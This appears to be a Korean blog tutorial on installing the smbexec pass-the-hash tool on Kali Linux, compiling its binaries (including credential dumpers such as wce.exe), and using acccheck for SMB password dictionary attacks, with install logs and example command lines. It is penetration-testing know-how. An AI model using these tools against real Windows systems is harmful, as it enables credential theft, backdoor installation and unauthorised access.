smbexec 툴소개
Smbexec는 hash 또는 일반 평문 텍스트 패스워드가 있는 윈도우 시스템을 exploit 할 수 있는 툴로 타겟 머신에 backdoor를 만들어 업로드하여 쉘을 따낼 수 있는 툴이다. 실제 Anti-Virus(V3와 같은 백신 툴)에 걸릴 위험도 적다.
Smbexec is a pass the hash tool if you have the hash or plain text password so you can exploit the windows system using this tool. This tool will generate a backdoor and uploading on a victim machine and running it so other side you will get the meterpreter shell. Av Detection chances are low.
참조링크
- BT5 r3 smbexec 설치
http://www.youtube.com/watch?v=ToFuZBNuolY - 윈도우 해킹방법
http://www.securitytube.net/video/6861
smbexec 설치
설치환경 : Kali Linux
| # cd /opt # git clone https://github.com/brav0hax/smbexec.git # cd smbexec # ./install.sh ************************************************************ smbexec installer A rapid psexec style attack with samba tools Original Concept and Script by Brav0Hax & Purehate PurpleTeam Smash! ************************************************************ Please choose your OS to install smbexec 1. Debian/Ubuntu and derivatives 2. Red Hat or Fedora 3. Microsoft Windows 4. Compile smbexec binaries 5. Exit Choice: 1 ... ... Making all in msvscpp make[1]: Entering directory `/tmp/smbexec-inst/libesedb-20120102/msvscpp' make[1]: Nothing to be done for `all'. make[1]: Leaving directory `/tmp/smbexec-inst/libesedb-20120102/msvscpp' make[1]: Entering directory `/tmp/smbexec-inst/libesedb-20120102' make[1]: Nothing to be done for `all-am'. make[1]: Leaving directory `/tmp/smbexec-inst/libesedb-20120102' [+] esedbtools have been installed... [+] I found nmap installed on your system [+] I found metasploit installed on your system [*] Running 'updatedb' again because we installed some new stuff ...happy hunting! // 설치가 완료되면 "즐겁게 사냥" 하라고 나온다. ;) |
설치가 완료되면 /opt 디렉토리 밑에 아래와 같이 4개의 폴더가 생성되 있음을 알 수 있다.
| root@kali:/opt# ll total 36 drwxr-xr-x 9 root root 4096 Oct 16 16:34 . drwxr-xr-x 23 root root 4096 Oct 16 15:39 .. drwxr-xr-x 3 root root 4096 Oct 16 16:33 creddump drwxrwxr-x 4 500 500 4096 Oct 16 16:34 esedbtools drwxr-xr-x 3 root root 4096 Oct 14 11:11 firmware-mod-kit drwxr-xr-x 6 root root 4096 Oct 14 13:07 metasploit drwxr-xr-x 4 root root 4096 Dec 14 2011 NTDSXtract drwxr-xr-x 6 root root 4096 Oct 16 16:15 smbexec drwxr-xr-x 7 root root 4096 Oct 14 11:10 Teeth |
윈도우용 바이너리 파일 컴파일
smbexec 바이너리 컴파일을 한다. ./install.sh를 다시 실행하여 해당 메뉴를 선택하고엔터.
| Please choose your OS to install smbexec 1. Debian/Ubuntu and derivatives 2. Red Hat or Fedora 3. Microsoft Windows 4. Compile smbexec binaries 5. Exit Choice: 4 This script will compile your smbexec binaries Press any key to continue ... ... Compiling ../nsswitch/winbind_nss_linux.c Linking bin/shared/libnss_winbind.so Linking bin/shared/libsamba-hostconfig.so.0.0.1 [+] smbwinexe has been compiled and moved to the progs folder... ************************************************************ smbexec installer A rapid psexec style attack with samba tools Original Concept and Script by Brav0Hax & Purehate PurpleTeam Smash! ************************************************************ Please choose your OS to install smbexec 1. Debian/Ubuntu and derivatives 2. Red Hat or Fedora 3. Microsoft Windows 4. Compile smbexec binaries 5. Exit |
컴파일이 완료되면 progs 폴더로 이동하라라고 나온다. 디렉토리를 확인해보면 아래와 같이 컴파일된 파일들을 볼 수 있다.
| root@kali:/opt/smbexec/progs# ll drwxr-xr-x 2 root root 4096 Oct 16 17:01 . drwxr-xr-x 6 root root 4096 Oct 16 16:15 .. -rwxr-xr-x 1 root root 27858 Oct 16 16:15 cachedump.rb -rwxr-xr-x 1 root root 1648 Oct 16 16:15 ntdspwdump.py -rwxr-xr-x 1 root root 6656780 Oct 16 16:54 smbexeclient -rwxr-xr-x 1 root root 10031583 Oct 16 16:58 smbwinexe -rwxr-xr-x 1 root root 691199 Oct 16 16:15 wce.exe |
smbexec를 이용한 윈도우 해킹
smbexec를 이용한 윈도우 시스템을 해킹하기 전에 먼저 윈도우 SMB 해킹부터 해야 한다.
BT5 또는 Kali에 이러한 툴이 있다.
acccheck 툴 사용
acccheck 툴은 SMB 프토로콜을 이용하여 타겟 윈도우 시스템에 인증을 받기 위한 패스워드 사전공격 툴로 고안되어졌다.
아래 내용을 보자.
| root@kali:/usr/share/doc/acccheck# more README.TXT acccheck.pl - Windows SMB Password Dictionary Attack Tool Copyright (C) 2008 Faisal Dean (Faiz) The tool is designed as a password dictionary attack tool that targets windows authentication via the SMB protocol. It is really a wrapper script around the 'smbclient' binary, and as a result is dependent on it for its execution. The simplest way to run the tool is as follows: ./acccheck.pl -t 10.10.10.1 This mode of execution attempts to connect to the target ADMIN$ share with the username 'Administrator' and a [BLANK] for the password. ./acccheck.pl -t 10.10.10.1 -u test -p test This mode of execution attempts to connect to the target IPC$ share with the username 'test' and a password 'test'. Each -t, -u and -p flags can be substituted by -T, -U and -P, where each represents an input file rather than a single input from standard in. E.g. ./acccheck.pl -T iplist -U userfile -P passwordfile Only use -v mode on very small dictionaries, otherwise, this has the affect of slowing the scan down to the rate the system writes to standard out. Any username/password combinations found are written to a file called 'cracked' in the working directory. Any comments can be emailed to me at: fmd@portcullis-security.com |
smb 접속 방어http://computer-forensics.sans.org/blog/2012/03/21/protecting-privileged-domain-accounts-access-tokens
댓글
댓글 쓰기